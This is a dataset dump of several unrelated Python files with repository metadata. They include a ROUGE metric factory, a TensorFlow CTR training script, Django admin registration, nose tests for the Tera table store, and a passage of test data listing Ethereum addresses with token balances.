1d765a0a23df4c912483a6a007dc80ce6d105998 | 272 | py | Python | satef/evaluation/impl/RougeMetricFactory.py | kostrzmar/SATEF | b483b073f1ff3dd797413f212e26114ef93cfe08 | [
"MIT"
] | null | null | null | satef/evaluation/impl/RougeMetricFactory.py | kostrzmar/SATEF | b483b073f1ff3dd797413f212e26114ef93cfe08 | [
"MIT"
] | null | null | null | satef/evaluation/impl/RougeMetricFactory.py | kostrzmar/SATEF | b483b073f1ff3dd797413f212e26114ef93cfe08 | [
"MIT"
] | null | null | null | from evaluation import AbstractEvaluationFactory
from evaluation import AbstractEvaluation
from evaluation.impl import RougeMetric
class RougeMetricFactory(AbstractEvaluationFactory):
def getEvaluationMetric(self) -> AbstractEvaluation:
return RougeMetric() | 34 | 56 | 0.834559 | 22 | 272 | 10.318182 | 0.590909 | 0.185022 | 0.176211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 272 | 8 | 57 | 34 | 0.953782 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.5 | 0.166667 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
1d7e61370359f481d661af27fdb358747be7cca1 | 6,116 | py | Python | ctrNet-tool/train.py | misads/ctr | cb94f06ae7a7c8df52d0dfa95104cfff67172e64 | [
"MIT"
] | 1 | 2019-12-23T05:13:28.000Z | 2019-12-23T05:13:28.000Z | ctrNet-tool/train.py | misads/ctr | cb94f06ae7a7c8df52d0dfa95104cfff67172e64 | [
"MIT"
] | null | null | null | ctrNet-tool/train.py | misads/ctr | cb94f06ae7a7c8df52d0dfa95104cfff67172e64 | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
import tensorflow as tf
import ctrNet
from sklearn.model_selection import train_test_split
from src import misc_utils as utils
import os
features = 20
dev = 'data/merge_train_clean_random1000000.csv'
#train = 'data/merge_train_clean.csv'
#train = 'data/unique_uid_merge_test_in_train_clean.csv'
#train = 'data/unique_uid_merge_test_in_train_clean_shuffle_1x.csv'
#train = 'data/merge_train_rm_robot_time_26_31_clean.csv'
train= 'data/600w_4500w.csv'
#train = 'data/m2.csv'
test = 'data/merge_test_clean.csv'
save_steps = 12787 # 38800
lr = 0.01 # 0.0002
k = 16
hashids = int(2e5) # 2e5
print('train dataset: '+ train)
print('val dataset:' + dev)
train_df=pd.read_csv(train ,header=None,sep=',')
train_df.columns=['label']+['f'+str(i) for i in range(features)]
#train_df, dev_df,_,_ = train_test_split(train_df,train_df,test_size=0.1, random_state=2019)
#dev_df, test_df,_,_ = train_test_split(dev_df,dev_df,test_size=0.5, random_state=2019)
dev_df = pd.read_csv(dev,header=None,sep=',')
test_df = pd.read_csv(test,header=None,sep=',')
dev_df.columns=['label']+['f'+str(i) for i in range(features)]
test_df.columns=['label']+['f'+str(i) for i in range(features)]
features=['f'+str(i) for i in range(features)]
'''
#FM
hparam=tf.contrib.training.HParams(
model='fm', #['fm','ffm','nffm']
k=16,
hash_ids=int(1e5),
batch_size=64,
optimizer="adam", #['adadelta','adagrad','sgd','adam','ftrl','gd','padagrad','pgd','rmsprop']
learning_rate=0.0002,
num_display_steps=100,
num_eval_steps=1000,
steps=200,
epoch=2,
metric='auc', #['auc','logloss']
init_method='uniform', #['tnormal','uniform','normal','xavier_normal','xavier_uniform','he_normal','he_uniform']
init_value=0.1,
feature_nums=len(features))
utils.print_hparams(hparam)
os.environ["CUDA_DEVICE_ORDER"]='PCI_BUS_ID'
os.environ["CUDA_VISIBLE_DEVICES"]='7'
model=ctrNet.build_model(hparam)
print("Testing FM....")
model.train(train_data=(train_df[features],train_df['label']),\
dev_data=(dev_df[features],dev_df['label']))
from sklearn import metrics
preds=model.infer(dev_data=(test_df[features],test_df['label']))
fpr, tpr, thresholds = metrics.roc_curve(test_df['label']+1, preds, pos_label=2)
auc=metrics.auc(fpr, tpr)
print(auc)
print("FM Done....")
'''
'''
#FFM
hparam=tf.contrib.training.HParams(
model='ffm', #['fm','ffm','nffm']
k=16,
hash_ids=int(1e5),
batch_size=64,
optimizer="adam", #['adadelta','adagrad','sgd','adam','ftrl','gd','padagrad','pgd','rmsprop']
learning_rate=0.0002,
num_display_steps=100,
num_eval_steps=1000,
epoch=2,
metric='auc', #['auc','logloss']
init_method='uniform', #['tnormal','uniform','normal','xavier_normal','xavier_uniform','he_normal','he_uniform']
init_value=0.1,
feature_nums=len(features))
utils.print_hparams(hparam)
os.environ["CUDA_DEVICE_ORDER"]='PCI_BUS_ID'
os.environ["CUDA_VISIBLE_DEVICES"]='2,3'
model=ctrNet.build_model(hparam)
print("Testing FFM....")
model.train(train_data=(train_df[features],train_df['label']),\
dev_data=(dev_df[features],dev_df['label']))
from sklearn import metrics
preds=model.infer(dev_data=(test_df[features],test_df['label']))
fpr, tpr, thresholds = metrics.roc_curve(test_df['label']+1, preds, pos_label=2)
auc=metrics.auc(fpr, tpr)
print(auc)
print("FFM Done....")
'''
#NFFM
hparam=tf.contrib.training.HParams(
model='nffm',
norm=True,
batch_norm_decay=0.9,
hidden_size=[128,128],
cross_layer_sizes=[128,128,128],
k=k,
hash_ids=hashids,
batch_size=4096,
optimizer="adam",
learning_rate=lr,
num_display_steps=100,
num_eval_steps=save_steps,
metric='auc',
epoch=1,
activation=['relu','relu','relu'],
cross_activation='identity',
init_method='uniform',
init_value=0.1,
feature_nums=len(features))
utils.print_hparams(hparam)
#os.environ["CUDA_DEVICE_ORDER"]='PCI_BUS_ID'
#os.environ["CUDA_VISIBLE_DEVICES"]='2,3'
model=ctrNet.build_model(hparam)
print("Testing NFFM....")
model.train(train_data=(train_df[features],train_df['label']),\
dev_data=(dev_df[features],dev_df['label']),\
test_data=(test_df[features],test_df['label']))
from sklearn import metrics
preds=model.infer(dev_data=(test_df[features],test_df['label']))
fpr, tpr, thresholds = metrics.roc_curve(test_df['label'], preds, pos_label=1)
auc=metrics.auc(fpr, tpr)
print(auc)
print("NFFM Done....")
#Xdeepfm
'''
hparam=tf.contrib.training.HParams(
model='xdeepfm',
norm=True,
batch_norm_decay=0.9,
hidden_size=[128,128],
cross_layer_sizes=[128,128,128],
k=8,
hash_ids=int(2e5),
batch_size=4096,
optimizer="adam",
learning_rate=lr,
num_display_steps=100,
num_eval_steps=save_steps,
epoch=1,
metric='auc',
activation=['relu','relu','relu'],
cross_activation='identity',
init_method='uniform',
init_value=0.1,
feature_nums=len(features))
utils.print_hparams(hparam)
#os.environ["CUDA_DEVICE_ORDER"]='PCI_BUS_ID'
#os.environ["CUDA_VISIBLE_DEVICES"]='7'
model=ctrNet.build_model(hparam)
print("Testing XdeepFM....")
model.train(train_data=(train_df[features],train_df['label']),\
dev_data=(dev_df[features],dev_df['label']),\
test_data=(test_df[features],test_df['label']))
from sklearn import metrics
preds=model.infer(dev_data=(test_df[features],test_df['label']))
fpr, tpr, thresholds = metrics.roc_curve(test_df['label'], preds, pos_label=1)
auc=metrics.auc(fpr, tpr)
print(auc)
print("XdeepFM Done....")
'''
| 33.790055 | 124 | 0.641269 | 856 | 6,116 | 4.33528 | 0.185748 | 0.030719 | 0.029642 | 0.029103 | 0.806521 | 0.785233 | 0.747507 | 0.747507 | 0.74104 | 0.74104 | 0 | 0.034825 | 0.192446 | 6,116 | 180 | 125 | 33.977778 | 0.716542 | 0.085513 | 0 | 0 | 0 | 0 | 0.113636 | 0.032828 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0.107143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1d944e8570a1abe035f3105f6401b9a7b2adfa33 | 117 | py | Python | iflai/ml/__init__.py | aliechoes/iflai | 74f20236a6fba4704fe3ab4cdde6fb64c6b1343e | [
"MIT"
] | null | null | null | iflai/ml/__init__.py | aliechoes/iflai | 74f20236a6fba4704fe3ab4cdde6fb64c6b1343e | [
"MIT"
] | null | null | null | iflai/ml/__init__.py | aliechoes/iflai | 74f20236a6fba4704fe3ab4cdde6fb64c6b1343e | [
"MIT"
] | null | null | null | from iflai.ml.FeatureExtractor import FeatureExtractor
from iflai.ml.AutoFeatureSelection import AutoFeatureSelection | 58.5 | 62 | 0.905983 | 12 | 117 | 8.833333 | 0.5 | 0.169811 | 0.207547 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059829 | 117 | 2 | 62 | 58.5 | 0.963636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d52aeb6ead02834d36a61ad65d30f8798759627c | 98 | py | Python | trade_app/trade/__init__.py | Plazas87/trading_stocks_platform | c34de11152798720cefa552f4b713231508e23a8 | [
"MIT"
] | null | null | null | trade_app/trade/__init__.py | Plazas87/trading_stocks_platform | c34de11152798720cefa552f4b713231508e23a8 | [
"MIT"
] | null | null | null | trade_app/trade/__init__.py | Plazas87/trading_stocks_platform | c34de11152798720cefa552f4b713231508e23a8 | [
"MIT"
] | 2 | 2020-10-28T14:07:43.000Z | 2021-11-03T22:49:21.000Z | from .trade import Trade
from .trade_components import TradeComponents, TradeResults, TradeStatus
| 32.666667 | 72 | 0.857143 | 11 | 98 | 7.545455 | 0.636364 | 0.216867 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102041 | 98 | 2 | 73 | 49 | 0.943182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d52afa843587323307ae06c2fe856a693b08539b | 197 | py | Python | servicebox/platforms/admin.py | FlxPeters/servicebox | 2fc39fa5ec6e629a0794fda003a7a0e4adf05202 | [
"Apache-2.0"
] | null | null | null | servicebox/platforms/admin.py | FlxPeters/servicebox | 2fc39fa5ec6e629a0794fda003a7a0e4adf05202 | [
"Apache-2.0"
] | null | null | null | servicebox/platforms/admin.py | FlxPeters/servicebox | 2fc39fa5ec6e629a0794fda003a7a0e4adf05202 | [
"Apache-2.0"
] | null | null | null | from django.contrib import admin
from mptt.admin import MPTTModelAdmin
from .models import Platform, PlatformGroup
admin.site.register(PlatformGroup, MPTTModelAdmin)
admin.site.register(Platform)
| 28.142857 | 50 | 0.847716 | 24 | 197 | 6.958333 | 0.5 | 0.107784 | 0.203593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086294 | 197 | 6 | 51 | 32.833333 | 0.927778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d52d2a413fd6b9b73e52b0ee4eb26f1f0cb97b07 | 43 | py | Python | tools/__init__.py | firestonelib/PASSL_1.0 | c1efd756dc6a22860ebdcf14d860e21f4ff78979 | [
"Apache-2.0"
] | null | null | null | tools/__init__.py | firestonelib/PASSL_1.0 | c1efd756dc6a22860ebdcf14d860e21f4ff78979 | [
"Apache-2.0"
] | null | null | null | tools/__init__.py | firestonelib/PASSL_1.0 | c1efd756dc6a22860ebdcf14d860e21f4ff78979 | [
"Apache-2.0"
] | null | null | null | from .model_stat import throughput, flops
| 21.5 | 42 | 0.813953 | 6 | 43 | 5.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.139535 | 43 | 1 | 43 | 43 | 0.918919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d54456596933237e231c735e592a3b63a8e70feb | 7,527 | py | Python | test/testcase/test_data.py | stevenswong/tera | 488cea75536287386d52cca411a6a9ee366b73c3 | [
"BSD-3-Clause"
] | 1 | 2019-05-02T00:28:06.000Z | 2019-05-02T00:28:06.000Z | test/testcase/test_data.py | stevenswong/tera | 488cea75536287386d52cca411a6a9ee366b73c3 | [
"BSD-3-Clause"
] | null | null | null | test/testcase/test_data.py | stevenswong/tera | 488cea75536287386d52cca411a6a9ee366b73c3 | [
"BSD-3-Clause"
] | null | null | null | """
Copyright (c) 2015, Baidu.com, Inc. All Rights Reserved
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.
"""
import nose
import common
@nose.tools.with_setup(common.create_kv_table, common.cleanup)
def test_scan_empty_kv():
"""
scan empty kv table
"""
table_name = 'test'
scan_file = 'scan.out'
common.scan_table(table_name=table_name, file_path=scan_file, allversion=True)
nose.tools.assert_true(common.file_is_empty(scan_file))
@nose.tools.with_setup(common.create_singleversion_table, common.cleanup)
def test_scan_empty_table():
"""
scan empty table table
"""
table_name = 'test'
scan_file = 'scan.out'
common.scan_table(table_name=table_name, file_path=scan_file, allversion=True)
nose.tools.assert_true(common.file_is_empty(scan_file))
@nose.tools.with_setup(common.create_singleversion_table, common.cleanup)
def test_rowreader_lowlevelscan():
"""
table rowreader_lowlevelscan
1. write data set 1
2. scan & compare
:return: None
"""
table_name = 'test'
dump_file = 'dump.out'
scan_file = 'scan.out'
common.run_tera_mark([(dump_file, False)], op='w', table_name=table_name,
cf='cf0:q00,cf0:q01,cf0:q02,cf1:q00,cf1:q01,cf1:q02', random='seq',
key_seed=1, value_seed=10, value_size=64, num=10, key_size=20)
common.rowread_table(table_name=table_name, file_path=scan_file)
nose.tools.assert_true(common.compare_files(dump_file, scan_file, need_sort=False))
@nose.tools.with_setup(common.create_kv_table, common.cleanup)
def test_kv_random_write():
"""
kv table write
1. write data set 1
2. scan & compare
:return: None
"""
table_name = 'test'
dump_file = 'dump.out'
scan_file = 'scan.out'
common.run_tera_mark([(dump_file, False)], op='w', table_name='test', random='random',
value_size=100, num=5000, key_size=20)
common.scan_table(table_name=table_name, file_path=scan_file, allversion=True)
nose.tools.assert_true(common.compare_files(dump_file, scan_file, need_sort=True))
@nose.tools.with_setup(common.create_singleversion_table, common.cleanup)
def test_table_random_write():
"""
table write simple
1. write data set 1
2. scan & compare
:return: None
"""
table_name = 'test'
dump_file = 'dump.out'
scan_file = 'scan.out'
common.run_tera_mark([(dump_file, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=10, value_size=100, num=10000, key_size=20)
common.scan_table(table_name=table_name, file_path=scan_file, allversion=False)
nose.tools.assert_true(common.compare_files(dump_file, scan_file, need_sort=True))
common.scan_table(table_name=table_name, file_path=scan_file, allversion=False, snapshot=0, is_async=True)
nose.tools.assert_true(common.compare_files(dump_file, scan_file, need_sort=True))
@nose.tools.with_setup(common.create_multiversion_table, common.cleanup)
def test_table_random_write_versions():
"""
table write w/versions
1. write data set 1
2. write data set 2
3. scan & compare
:return: None
"""
table_name = 'test'
dump_file1 = 'dump1.out'
dump_file2 = 'dump2.out'
scan_file = 'scan.out'
common.run_tera_mark([(dump_file1, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q',
random='random', key_seed=1, value_seed=10, value_size=100, num=10000, key_size=20)
common.run_tera_mark([(dump_file1, True), (dump_file2, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=11, value_size=100, num=10000, key_size=20)
common.scan_table(table_name=table_name, file_path=scan_file, allversion=True)
nose.tools.assert_true(common.compare_files(dump_file1, scan_file, need_sort=True))
common.scan_table(table_name=table_name, file_path=scan_file, allversion=True, snapshot=0, is_async=True)
nose.tools.assert_true(common.compare_files(dump_file1, scan_file, need_sort=True))
common.scan_table(table_name=table_name, file_path=scan_file, allversion=False)
nose.tools.assert_true(common.compare_files(dump_file2, scan_file, need_sort=True))
common.scan_table(table_name=table_name, file_path=scan_file, allversion=False, snapshot=0, is_async=True)
nose.tools.assert_true(common.compare_files(dump_file2, scan_file, need_sort=True))
@nose.tools.with_setup(common.create_singleversion_table, common.cleanup)
def test_table_write_delete():
"""
table write and deletion
1. write data set 1
2. delete data set 1
3. scan & compare
:return: None
"""
table_name = 'test'
scan_file = 'scan.out'
common.run_tera_mark([], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=1, value_size=100, num=10000, key_size=20)
common.run_tera_mark([], op='d', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=1, value_size=100, num=10000, key_size=20)
common.scan_table(table_name=table_name, file_path=scan_file, allversion=True)
nose.tools.assert_true(common.file_is_empty(scan_file))
common.scan_table(table_name=table_name, file_path=scan_file, allversion=False, snapshot=0, is_async=True)
nose.tools.assert_true(common.file_is_empty(scan_file))
@nose.tools.with_setup(common.create_multiversion_table, common.cleanup)
def test_table_write_delete_version():
"""
table write and deletion w/versions
1. write data set 1, 2, 3, 4
2. scan
3. delete data set 3
4. scan & compare
:return: None
"""
table_name = 'test'
dump_file1 = 'dump1.out'
dump_file2 = 'dump2.out'
scan_file1 = 'scan1.out'
scan_file2 = 'scan2.out'
common.run_tera_mark([(dump_file1, False), (dump_file2, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q',
random='random', key_seed=1, value_seed=10, value_size=100, num=10000, key_size=20)
common.run_tera_mark([(dump_file1, True), (dump_file2, True)], op='w', table_name=table_name, cf='cf0:q,cf1:q',
random='random', key_seed=1, value_seed=11, value_size=100, num=10000, key_size=20)
common.run_tera_mark([(dump_file1, True)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=12, value_size=100, num=10000, key_size=20)
common.run_tera_mark([(dump_file1, True), (dump_file2, True)], op='w', table_name=table_name, cf='cf0:q,cf1:q',
random='random', key_seed=1, value_seed=13, value_size=100, num=10000, key_size=20)
common.compact_tablets(common.get_tablet_list(table_name))
common.scan_table(table_name=table_name, file_path=scan_file1, allversion=True, snapshot=0)
common.run_tera_mark([], op='d', table_name=table_name, cf='cf0:q,cf1:q', random='random', key_seed=1,
value_seed=12, value_size=100, num=10000, key_size=20)
common.compact_tablets(common.get_tablet_list(table_name))
common.scan_table(table_name=table_name, file_path=scan_file2, allversion=True, snapshot=0)
nose.tools.assert_true(common.compare_files(dump_file1, scan_file1, need_sort=True))
nose.tools.assert_true(common.compare_files(dump_file2, scan_file2, need_sort=True))
| 43.761628 | 133 | 0.700146 | 1,162 | 7,527 | 4.253012 | 0.100688 | 0.111089 | 0.070822 | 0.091056 | 0.879401 | 0.877782 | 0.874747 | 0.871105 | 0.825172 | 0.81728 | 0 | 0.040686 | 0.170586 | 7,527 | 171 | 134 | 44.017544 | 0.750921 | 0.097516 | 0 | 0.608247 | 0 | 0.010309 | 0.062034 | 0.007146 | 0 | 0 | 0 | 0 | 0.14433 | 1 | 0.082474 | false | 0 | 0.020619 | 0 | 0.103093 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d55049dc6723dd0f05dca5fd9bcce271974163bc | 69,452 | py | Python | test_data.py | JoaoCampos89/0xbtc-discord-price-bot | 6eb6839213dfb0176c0be72c2dda7193d4131750 | [
"MIT"
] | null | null | null | test_data.py | JoaoCampos89/0xbtc-discord-price-bot | 6eb6839213dfb0176c0be72c2dda7193d4131750 | [
"MIT"
] | null | null | null | test_data.py | JoaoCampos89/0xbtc-discord-price-bot | 6eb6839213dfb0176c0be72c2dda7193d4131750 | [
"MIT"
] | null | null | null |
top_1000_holders = (
(1, '0xc91795a59f20027848bc785678b53875934792a1', 168055.0),
(2, '0x8d12a197cb00d4747a1fe03395095ce2a5cc6819', 86981.09296424),
(3, '0x327432a31cc79c697befe20a52f5d2214cbf0be4', 86686.42293475),
(4, '0xe03c23519e18d64f144d2800e30e81b0065c48b5', 84022.33928554),
(5, '0x6a1cb270d2783ed7303d6403cc95241210b1eacf', 82011.0),
(6, '0x69c86b520b5388da58de26d7359691f8b977eb24', 75440.98899182),
(7, '0x2a0c0dbecc7e4d658f48e01e3fa353f44050c208', 70138.44433512),
(8, '0xb86bb5fc804768db34f1a37da8b719e19af9dffd', 40579.69354045),
(9, '0x8fd5f49ee858e788856412c540e27982d438adc1', 38077.86678947),
(10, '0x55f841e0f77ac574d64b334976946e4fca348e9b', 36197.32435793),
(11, '0x6f9bb603f19f2fb63a3d743860b994016df70bf4', 35598.13488865),
(12, '0x5ffabb924ca8216ac08861eb9171c4cccddd32f6', 34924.25393892),
(13, '0x44e9e39273db66826d12098ba7c9cec15505ebb0', 33007.11995818),
(14, '0xe3740b267b3a561cc931e51f22855029a6e35854', 32139.11872249),
(15, '0x86e6301c7d3f961e508c64e03f73d64799fcc5a4', 31815.0),
(16, '0xc3bf837ab9779424c78385b9c843e74178693f17', 31562.8755694),
(17, '0xb9d82aa3b15b5956dc21f117515abbbda1efa4d6', 29673.2185391),
(18, '0x326d9d4870c636d9b25c939237e0f1ea9ea1a974', 28928.85653498),
(19, '0x778f8d797efc24b1516dc7321920a1fd2b639a7e', 28736.27946675),
(20, '0xbf45f4280cfbe7c2d2515a7d984b8c71c15e82b7', 25518.64353119),
(21, '0x0fb1cd32b5d0f767f3a36f4ffeca8e4969b47f6e', 25279.88237447),
(22, '0x3c2e663c5e517bcc1134acfd7ce71b94b7e6da2f', 24353.00844724),
(23, '0x14b08137ec1c92f6110b0587a87e4904448d20ff', 24000.0),
(24, '0x4533b3a3f7606062705844778fdfa1be338b57f1', 23900.0),
(25, '0xdf1990774b1ab5c24274b9fce520e94effba8e70', 22696.27021038),
(26, '0x51f21392482224c123fecdafa9543fc5b7d14847', 21758.32357339),
(27, '0x6b9c15cc1d35be1001bf020394548b744d6dfd21', 21350.03693429),
(28, '0xa820cd25a61c1b12085a7f232cf01ddfb88f267d', 21000.0),
(29, '0xad738df8c0c1cb9f2e5f403c06ae25a8478c6077', 20155.34753473),
(30, '0xf0347ed4a1a74a6ae7dd1cfa48a3477fee461771', 19834.65048894),
(31, '0x249b8ab5c0b29cb63cbc88c0971806d41182d469', 19700.0),
(32, '0x6dd4aedd751bc6a3169a56a3d7dc6c557f9adbc1', 19500.0),
(33, '0xc718a048a66035200ae889b6e5ccfd7fe47422ad', 19350.0),
(34, '0x4a746a4be02c093bba7a3717e76a08344a64d4e5', 18991.52651168),
(35, '0xa2ed64126ddb337b41cfb988c9b0fecd0541cd39', 18681.82704739),
(36, '0x29a508940e2ff3be847cdf7db24391ae62ec998a', 18616.74619077),
(37, '0xbb6ab3cf7cabe055a96ca165421927305ee4d30b', 18569.51711699),
(38, '0x560ea9b1f348aff179d9bf5b02b50cc04abd344c', 18250.0),
(39, '0xf12619f9b3d82bc65fe2cf07ad6f7efcf548f94c', 17550.0),
(40, '0xe332eb2f5fa463c0ff5c733646327b6be7f870db', 17142.7994556),
(41, '0xf2E7474BF1547b5927F8985B35107183C8aC25f7', 16756.8635621),
(42, '0x955b13186bf8cddba2b97471483d26f302f2072e', 16550.0),
(43, '0xa80009a98ad783351be9c19cf51193b9a9aefc62', 16050.0),
(44, '0xf906e0238a308b00f50ec7b932db3faebf4795c2', 15950.0),
(45, '0x954b67f9bb6fa3c73b894dfce487b6c970eced77', 15950.0),
(46, '0x9b1a161bdb6cd429e12e09fdd287de2c094f4295', 15361.89157954),
(47, '0x664b1f16c8c120f3d99dd372315b6e5a96f7ef40', 15105.53242574),
(48, '0xc1cd31c394edc5c648dc376a51d43e4f9ad2465c', 15000.77440421),
(49, '0x5d35db09e1ef7a2ba65ebfd2f377a59f62f2355a', 15000.0),
(50, '0xbd6b376c884b600731bff0053eb5869587279e34', 14317.42608519),
(51, '0x10e8e873f03d10094de678702a4a5df03cc285dd', 14174.0),
(52, '0xb6f6d05f978af3c5335380fdd9f6993031e29ada', 14000.0),
(53, '0xff190a4cc92b154635140335791d3779f60dc311', 13479.85348),
(54, '0x02e8d1E187f80D68FE414111C4f0AD26011f9A89', 13250.0),
(55, '0x0969a43951cda021a72b1eb8e5db620491c5740c', 13000.0),
(56, '0x26f2a6e1d3d94f9354f53685be9c24d3b7e03306', 12934.78804807),
(57, '0x1018bdd2026dc53ea1e9a2d0f222048f24874c7d', 12883.0),
(58, '0x07B950A89D7913516B0beD483536B53A0266c8a7', 12550.0),
(59, '0xcc675e6688255169effec1b556730ba2479a9ea3', 12488.97376835),
(60, '0x9d9aefba215363f2def001478818dc288805a34c', 12049.10023846),
(61, '0xf438886574fc6aacbbc1c1a139d4bdecb2ec34bc', 11950.0),
(62, '0xac71aabfb3847f499aa65e02dbcc6646a42c4a09', 11838.13695172),
(63, '0x2202ae82877ac6f5e516bb9db841b28f3d8f6681', 11570.0),
(64, '0x065a37eead5b3889717be041abb8af3fb070e889', 11532.32508426),
(65, '0xf38dBB29ea87850DfBB7F17795D0A9c33811670D', 11500.0),
(66, '0xe0729a1ae5019f259cd02797915d9a7e8915035a', 11413.0),
(67, '0x04806bac84ccde79da6b376398dfeb42888def50', 11003.49458216),
(68, '0xde4c8857a3719127c8f8a771dbfc4d3aea2c58dc', 10703.13408212),
(69, '0x444b0f5050f6c21a310131fd1409b6492c93d169', 10573.15499114),
(70, '0xe1874b684a454f0643f2419aa105715328c5bbd3', 10523.35593131),
(71, '0x017d74b121c0161a09204b8112838fa55f6c7c28', 10365.70518057),
(72, '0xce43a38234a9ef7e2713b07c1305ee34c887519d', 10323.42213666),
(73, '0xe3e5a431478b622826ceabed15f653cce86316dd', 10115.0),
(74, '0x991bd83f4c601fc3798839d4e4372d628607f7c9', 10059.0),
(75, '0x74b39872dd7726964d571d54456760fa114061d7', 10000.3149103),
(76, '0x596511082a4475bf952cff3d11d0beacea09b566', 10000.0),
(77, '0x436328a0234fedb420C7693bB7C74f53393bc282', 9950.0),
(78, '0x568d354723b6730d7a0d09e0cfd6911f3c2eac87', 9743.75605808),
(79, '0xf4a5881b38d9e6bdb5b26fe31a0a8c3164c827a3', 9620.0),
(80, '0x65309c191325f87d75cd55faaed40d5963238282', 9473.444372),
(81, '0xbfb595963d5cac4296d86a32ce92102ea78c33cd', 9421.0),
(82, '0x523e099ecf075cb42fb2bb54d9b95eb15e63af83', 9419.81061676),
(83, '0xbc43d4ba301223315fa6c11722263c022ab92d05', 9406.79661033),
(84, '0x7749db3a5918b0bcd1a61cbf00b9e449533ce083', 9314.734),
(85, '0x57de0d94f85d9b8ed865131e2731ff86edc2a231', 9265.0),
(86, '0x66ff763f177cf65e2aeffa4fd5afba547b588018', 9186.41596562),
(87, '0xef419e05e15951fde65477bc444cefbedd042038', 8886.0),
(88, '0x7c09ed1cf18f34bded7eecc31c078f9ac84f8bdd', 8800.0),
(89, '0x8c469b5b7afa5ee847864f558de822fb2e338e45', 8556.26175341),
(90, '0x34eb01faf7d5e90a245f60d83a9790628e6c4405', 8321.42158034),
(91, '0xcb29dfecb1f172189460df860ecaa603396e1157', 8000.0),
(92, '0xc854b796648e31ee25b83ce30ddab8ff3402437c', 7807.01110065),
(93, '0xff7c6977c5e9fb5607f80d7fc57632bea8d85191', 7746.0),
(94, '0x4b2dff7d92f2865f3b1ae2d018c0bf6565923ee9', 7588.97860943),
(95, '0x2850250328347d6135e8aefa4800c8a6944fd7b3', 7350.56746817),
(96, '0x7ff49eaa3794ff7f24c86d11683c24e748ac4c0c', 7257.14485542),
(97, '0x31316c75768ca10f683e17882b34d13fc1caccb6', 7227.0),
(98, '0xab96a6e4ce7c4cbbaf44d7955eaed799694b1275', 7203.0),
(99, '0x7dee5dd185107c1fbe84202888330be03897989a', 7159.1234115),
(100, '0xce749bd8ed07de10b87eab1dc0400e5cd032a5c9', 6961.9514499),
(101, '0xc97497cb5a54d28753a7b812b4c9b38a08179d11', 6889.76607399),
(102, '0x80d5aeda8434eb33164425ff85ad44e397f26422', 6886.94643542),
